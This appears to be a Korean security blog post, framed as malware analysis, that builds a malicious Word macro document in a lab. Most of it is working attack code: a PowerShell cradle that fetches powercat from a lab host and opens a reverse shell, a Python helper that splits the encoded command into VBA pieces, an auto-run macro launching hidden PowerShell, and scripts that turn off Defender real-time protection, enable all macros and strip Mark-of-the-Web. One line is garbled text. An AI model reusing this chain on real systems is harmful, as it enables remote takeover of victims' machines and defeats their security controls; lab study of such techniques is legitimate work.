🔒정보보안/악성코드 & 취약점 분석

악성코드 분석 - 매크로 문서 악성 파일 (Malware analysis: malicious macro document)

Janger 2025. 7. 26. 16:38

 

 

 

 

 

 

 

 

 

# Plaintext form of the command the macro later carries base64/UTF-16LE-encoded.
# Stage 1: download cradle - fetch powercat.ps1 over cleartext HTTP from the lab
#          attacker host and execute it in memory (nothing is written to disk).
# Stage 2: powercat connects back to 192.168.119.2:4444 and binds an interactive
#          powershell to that socket (reverse shell).
$wc = New-Object System.Net.WebClient; IEX $wc.DownloadString('http://192.168.119.2/powercat.ps1'); powercat -c 192.168.119.2 -p 4444 -e powershell

 

 

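def vba_chunks(payload, n=50, var="Str"):
    """Split `payload` into VBA statements that rebuild it by concatenation.

    VBA will not accept an over-long string literal on a single line, so a
    long `powershell.exe ... -enc <base64>` command is emitted as pieces of
    `n` characters (`Str = Str + "..."`) that the macro glues back together
    at run time.

    Args:
        payload: the full command line to embed.  The `-enc` argument is
            base64 of UTF-16LE text (its prefix SQBFAFgA decodes to "IEX").
        n: characters per piece; must be >= 1.
        var: name of the VBA String variable being built up.

    Returns:
        A list of VBA statements, one per piece; empty for an empty payload.
        A double quote inside `payload` is doubled, which is how VBA escapes
        a quote inside a literal -- the original emitted it raw and would
        have generated a macro that does not compile in that case.

    Raises:
        ValueError: if `n` is smaller than 1.
    """
    if n < 1:
        raise ValueError("chunk size n must be >= 1")
    pieces = [payload[i:i + n] for i in range(0, len(payload), n)]
    return [var + " = " + var + ' + "' + piece.replace('"', '""') + '"'
            for piece in pieces]


# Encoded one-liner from the listing above; "..." stands for the truncated
# remainder of the base64 blob (use the complete blob when generating a macro).
# The original bound this to the name `str`, shadowing the builtin.
payload = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwA..."

for line in vba_chunks(payload, 50):
    print(line)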

์ฒญํฌํ™”(๋ฌธ์ž์—ด์ด ๋„ˆ๋ฌด ๊ธธ๋ฉด ์˜ค๋ฅ˜๊ฐ€ ๋ฐœ์ƒ)

 

' Legacy Word auto-execute hook: runs as soon as the document is opened
' (once macros are allowed) and only hands off to MyMacro, so the payload
' is defined in one place.
Sub AutoOpen()
    Call MyMacro
End Sub

' Second auto-execute hook (the ThisDocument event form). Both this and
' AutoOpen are defined so the macro fires whichever one Word honours for
' this document; each just delegates to MyMacro.
Sub Document_Open()
    Call MyMacro
End Sub

' Rebuilds the full "powershell.exe -nop -w hidden -enc <base64>" command
' line from short pieces and runs it. -enc takes base64 of UTF-16LE text:
' the first chunk "SQBFAFgAKABOAGU" decodes to "IEX(Ne", i.e. the same
' download-cradle shown above, and the visible tail chunks decode to
' "192.168.118.2 -p 4444 -e powershell" (note the .118.2 here vs .119.2
' in the plaintext one-liner above -- presumably a different lab session).
Sub MyMacro()
    Dim Str As String
    
    ' Pieces are concatenated at run time because VBA rejects an over-long
    ' literal on one line (see the Python chunker above). "..." marks chunks
    ' elided from the listing; the final piece ends with a trailing space.
    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
        Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
        Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
    ...
        Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA"
        Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
        Str = Str + "A== "

    ' WScript.Shell.Run spawns powershell.exe as a child of WINWORD.EXE --
    ' the parent/child pair that endpoint detection commonly alerts on.
    ' "-w hidden" in the command line keeps the PowerShell window unseen.
    CreateObject("Wscript.Shell").Run Str
End Sub

 

 

applications_install.ps1
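# Return the host's IPv4 address in the 192.168.0.0/16 range (the lab network),
# or $null when there is none. Get-NetIPAddress can fail early in boot before
# the network stack is up, so one failure is tolerated with a 22 s pause and a
# single retry; a failure of the retry propagates to the caller.
function Get-IP {
    # Only IPv4 can match the "192.168*" prefix, so filter up front and take the
    # first hit: callers do .Split('.') on the result and need a single string,
    # never an array (the original returned every matching address).
    # -ErrorAction Stop turns the cmdlet's non-terminating errors into ones the
    # catch below actually sees; without it the retry never ran.
    function Get-LabAddress {
        return (Get-NetIPAddress -AddressFamily IPv4 -ErrorAction Stop |
            Where-Object { $_.IPAddress -like "192.168*" } |
            Select-Object -First 1 -ExpandProperty IPAddress)
    }
    try {
        return Get-LabAddress
    } catch {
        Start-Sleep -Seconds 22
        return Get-LabAddress
    }
}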

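# Lab-VM provisioning: wait until the box has been re-addressed off the
# template network (third octet 50), then make sure Word is installed so the
# macro document can later be opened by applications_exec.ps1.
$old_ip = '192.168.50.198'   # address baked into the template image
$third = 50
$octets = ""

# Poll until the third octet is no longer 50. Get-IP returns $null while the
# adapter has no 192.168.* address yet; the original called $null.Split() and
# died there, so skip the parse and keep waiting in that case.
while ($third -eq 50) {

    $curr_ip = Get-IP
    if (-not $curr_ip) {
        Start-Sleep -Seconds 15
        continue
    }
    $octets = $curr_ip.Split('.')
    $third = $octets[2]           # a string; -eq 50 compares it as "50"
    if ($third -eq 50) {
        Start-Sleep -Seconds 15
    }
}


$local_ip = Get-IP
if ($local_ip -ne $old_ip){

    # Probe for Word through COM: if Word.Application cannot be created, Office
    # is not installed. Quit the instance on success -- the original left a
    # background WINWORD.EXE running every time this script ran.
    try {
        $word = new-object -comobject word.application
        $word.version
        $word.Quit()
    }
    catch {
        Mount-DiskImage -ImagePath C:\tools\Office2019.img
        E:\Office\Setup32.exe         # assumes the image mounts as E: -- not verified here
        Start-Sleep -Seconds 120000   # park the script (~33 h) while the installer runs
    }
}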

 

 

applications_exec.ps1
# Lab-VM trigger: open the planted macro document once so its AutoOpen /
# Document_Open hook fires, with the Office and Defender guards that would
# normally stop it switched off first. Runs as Administrator on a target that
# is meant to be vulnerable; do not reuse these steps on a real host.
$pending = 'C:\Users\Administrator\Documents\webapp\ticket.doc'
$staged  = 'C:\Users\Administrator\Documents\ticket.doc'

If (Test-Path $pending)
{
    # Office installer still running -> try again on the next invocation.
    if (Get-Process Setup32 -ErrorAction SilentlyContinue) {
        exit
    }

    # Word must start cleanly before the document is opened; give up if not.
    try { Start-Process WINWORD } catch { exit}

    # Disable Defender real-time protection so the macro's PowerShell child
    # (download cradle + reverse shell) is not blocked.
    Set-MpPreference -DisableRealtimeMonitoring $true
    
    Start-Sleep -Seconds 10
    Stop-Process -Name "WINWORD" -Force

    # VBAWarnings = 1 is the "Enable all macros" setting for Office 16.0, so the
    # document runs its macro with no prompt.
    New-ItemProperty -Path Registry::HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security -Name "VBAWarnings" -Value "1" -PropertyType DWORD -Force

    # Move the file out of the web-app drop folder, strip Mark-of-the-Web
    # (Zone.Identifier) so Protected View does not intervene, open it with the
    # default handler, and remove it once the macro has had time to run.
    Move-Item -Path $pending -Destination $staged
    Unblock-File -Path $staged
    Start-Process -FilePath $staged
    Start-Sleep -Seconds 20
    Remove-Item $staged
}

 
